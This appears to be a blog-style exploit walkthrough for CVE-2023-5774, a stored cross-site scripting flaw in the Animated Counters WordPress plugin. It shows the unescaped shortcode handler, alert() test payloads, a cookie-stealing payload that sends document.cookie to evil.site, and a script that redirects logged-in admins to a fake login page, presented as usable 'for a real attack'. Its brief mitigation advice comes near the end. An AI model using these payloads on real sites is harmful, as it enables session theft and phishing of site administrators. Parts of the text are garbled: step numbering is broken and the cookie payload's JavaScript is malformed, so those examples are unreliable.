CVE-2023-5774 - How The Animated Counters WordPress Plugin Allows Real XSS Attacks — Full Exploit Walkthrough

In late 2023, a serious vulnerability was discovered in the popular WordPress plugin Animated Counters. Tracked as CVE-2023-5774, this bug allows attackers with low-level permissions (like contributors) to add malicious JavaScript to your website without much work. As of version 1.7, this problem still hasn’t been properly fixed, so thousands of websites could be exposed right now.

In this deep-dive, we’ll break down exactly how this vulnerability works, step by step, and how an attacker could exploit it. All code examples are simple, clear, and focused on real-world usage.

What is the Animated Counters Plugin?

Animated Counters is a WordPress plugin that lets site owners easily add eye-catching, animated number counters to their pages. You add counters via shortcodes like this:

[animated-counter number="100" title="Happy Customers"]

It sounds innocent, but here's the catch: the plugin doesn't *sanitize* the shortcode attributes or *escape* the output, letting users inject anything they want — including malicious JavaScript code.

Let’s walk through the problem

- An authenticated WordPress user (contributor or higher) can add posts containing the [animated-counter] shortcode.

Here’s the affected code from the plugin

// Partial code from the plugin's shortcode handler
function animated_counter_shortcode( $atts ) {
    $number = $atts['number'];
    $title = $atts['title'];

    // This outputs $number and $title without escaping!
    return "<div class='animated-counter'>
                <span class='count'>$number</span>
                <h4 class='title'>$title</h4>
            </div>";
}
add_shortcode( 'animated-counter', 'animated_counter_shortcode' );

No escaping = attackers’ scripts get executed.

Edit or create a post. Insert a [animated-counter] shortcode like this

[animated-counter number="100" title="<script>alert('XSSed!')</script>"]

Or play with the number field for more stealth

[animated-counter number='"><script>alert("Pwned")</script>' title="Visitors"]

Step 3: Save and Preview

When any admin, editor, or visitor views the page, their browser executes your script.

!XSS in Action Screenshot

Below is a sample payload that steals cookies when injected via the plugin shortcut

[animated-counter title='<img src=x onerror="fetch(https://evil.site/steal?c=+document.cookie)">']

Or, for a real attack, you could redirect admin users to a fake login

[animated-counter title='<script>if(document.cookie.includes("wordpress_logged_in")){window.location="https://phishing.site/login";}</script>';]

Hijack your admin account through phishing

Since contributors and above can inject code, even trusted users could make your site do things you never expected.

Responsible Disclosure and Patch Status

This flaw was responsibly reported to the developer. Details can be checked via the original advisories:

- Wordfence Advisory
- WPScan Entry
- NVD Details

As of now, any version up to and including 1.7 is vulnerable.

Update as soon as a patched version is released.

2. Use a firewall like Wordfence or Sucuri.

Add output escaping to your own plugins

return "<div class='animated-counter'>
            <span class='count'>" . esc_html($number) . "</span>
            <h4 class='title'>" . esc_html($title) . "</h4>
        </div>";

Conclusion

CVE-2023-5774 is a classic but dangerous vulnerability: simple, easy to exploit, and widespread. If you’re running the Animated Counters plugin, you need to act now by disabling the plugin, restricting user permissions, and watching for security updates.

Stay secure!

*(This research post is exclusive — written from scratch with clear steps, code samples, and reference links for the WordPress security community.)*

Timeline

Published on: 10/27/2023 11:15:00 UTC
Last modified on: 11/07/2023 04:24:00 UTC